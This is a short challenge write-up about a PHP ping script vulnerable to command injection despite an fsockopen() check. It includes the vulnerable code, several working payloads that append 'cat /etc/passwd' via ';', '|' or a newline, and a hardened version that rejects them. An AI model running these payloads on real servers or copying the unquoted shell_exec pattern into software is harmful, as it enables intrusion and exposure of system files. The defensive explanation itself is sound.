PHP Feature or 0day?

Today one of my friends @RakeshMane10 gave me a challenge which I found pretty interesting.

<?php
ini_set('display_errors', 0);   // the challenge as given reads 'error_displays', a typo for the real directive
$ip = htmlspecialchars($_GET['url'], ENT_QUOTES);   // HTML-escapes only; shell metacharacters (; | newline) pass through untouched
$f = fsockopen($ip, 80, $errno, $errstr, 5);        // the only "validation": try to connect to port 80 on the given host
if ($f) {
	$result = shell_exec('ping -c 1 ' . $ip);          // $ip is concatenated unquoted into the shell command
	echo '<div class="alert alert-success">' . nl2br($result) . '</div>';
} else {
	echo '<div class="alert alert-danger">' . $errstr . '</div>';
}
?>

From what I noticed, fsockopen checks whether port 80 is open on the given host, and only if it is does the $ip variable get passed to shell_exec. Basically fsockopen has to return a valid pointer (a PHP resource).

If we pass the input like this

?url=127.0.0.1; cat /etc/passwd

we get this error message.

php_network_getaddresses: getaddrinfo failed: Name or service not known

I simply added a space in front of the IP and noticed that we get a valid pointer from fsockopen 🙂

Resource id #1

It seems the IP part is validated (port 80 is open) and the rest of the string is ignored by the function.

?url=127.0.0.1 ;cat /etc/passwd

Other possible ways:

?url=127.0.0.1 |cat /etc/passwd
?url=127.0.0.1%0acat /etc/passwd
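The root cause is that a reachable port 80 is treated as proof that the input is safe, while the string itself is never checked. As an added example (my own code, not part of the original challenge or post; the function names validate_target and build_ping_command are mine), here is a hardened version of the handler that validates the input as an IP literal before it gets anywhere near a shell and quotes it with escapeshellarg() as a second layer. The sample inputs are the payloads from the post plus a benign address, constructed here to show which ones are rejected.

```php
<?php
// Added example (not from the original post): hardened version of the challenge handler.

// Accept only a syntactically valid IPv4/IPv6 literal. FILTER_VALIDATE_IP rejects
// any trailing characters, so "127.0.0.1 ;cat /etc/passwd", "127.0.0.1 |cat /etc/passwd"
// and "127.0.0.1\ncat /etc/passwd" all fail here, unlike the fsockopen() check in the
// post, which happily connects to 127.0.0.1 and ignores the rest of the string.
function validate_target(string $input): ?string {
    if (filter_var($input, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    return $input;
}

// Build the command with escapeshellarg() so the target is always a single quoted
// argument. This matters as defence in depth: if validation is later relaxed to
// allow hostnames, an unquoted concatenation would reintroduce the injection.
function build_ping_command(string $target): string {
    return 'ping -c 1 ' . escapeshellarg($target);
}

// Request handler: validate first, only then touch the network or the shell.
// Output (not input) is HTML-escaped, since that is where HTML context applies.
function handle_ping_request(string $url): string {
    $target = validate_target($url);
    if ($target === null) {
        return '<div class="alert alert-danger">invalid target</div>';
    }
    $f = @fsockopen($target, 80, $errno, $errstr, 5);
    if (!$f) {
        return '<div class="alert alert-danger">' . htmlspecialchars($errstr, ENT_QUOTES) . '</div>';
    }
    fclose($f);
    $result = (string) shell_exec(build_ping_command($target));
    return '<div class="alert alert-success">' . nl2br(htmlspecialchars($result, ENT_QUOTES)) . '</div>';
}

// Constructed sample inputs: the payloads from the post plus one benign address.
$samples = [
    '127.0.0.1',
    '127.0.0.1; cat /etc/passwd',
    '127.0.0.1 ;cat /etc/passwd',
    '127.0.0.1 |cat /etc/passwd',
    "127.0.0.1\ncat /etc/passwd",
];

foreach ($samples as $s) {
    $t = validate_target($s);
    if ($t === null) {
        echo 'rejected: ' . json_encode($s) . "\n";
    } else {
        echo 'accepted: ' . json_encode($s) . ' -> ' . build_ping_command($t) . "\n";
    }
}
```

Run with `php hardened_ping.php`: only the plain `127.0.0.1` is accepted, and even that one reaches the shell as the single-quoted argument `'127.0.0.1'`. If hostnames must be supported, replace FILTER_VALIDATE_IP with a strict allowlist pattern such as `/^[A-Za-z0-9.-]{1,253}$/` rather than relying on fsockopen() to reject bad input, since the post shows it does not.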

